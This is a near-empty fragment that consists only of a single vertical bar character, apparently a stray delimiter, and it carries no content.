|
